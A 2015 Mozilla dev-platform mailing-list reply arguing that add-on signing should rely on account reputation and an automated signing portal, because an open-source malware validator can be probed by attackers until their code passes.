On 27/11/15 15:50, Gavin Sharp wrote: > No, that's not right. There's an important distinction between > "finding malicious JS code" and "finding _all_ malicious JS code". The > latter is impossible, but the former isn't. > > Proving "the validator won't catch everything" isn't particularly > relevant when it isn't intended to, in the overall add-on signing > system design.
If the validator is open source, which it is, then anyone who wants to get code past it can just use it as an oracle until it passes. Therefore, given malicious intent, I would expect the validator not to catch _anything_. We need to base the system on reputation, not on code scanning. We can either hand out code signing certs and do the reputation based on them, or have an _automated_ code signing portal and tie the reputation to the accounts on that. As cert revocation doesn't work well, the latter seems to offer much more control and to be the better plan. If we accept, as you seem to, that no system can catch everything, then I think the right "not catching everything" is the risk of AMO high-reputation account compromise. Having that as your weak spot allows the building of a system where people like Dan, who have high reputation, can automatically sign as many builds as they want and, fundamentally, keep shipping products. Which is what we all want. Gerv _______________________________________________ dev-platform mailing list dev-platform@lists.mozilla.org https://lists.mozilla.org/listinfo/dev-platform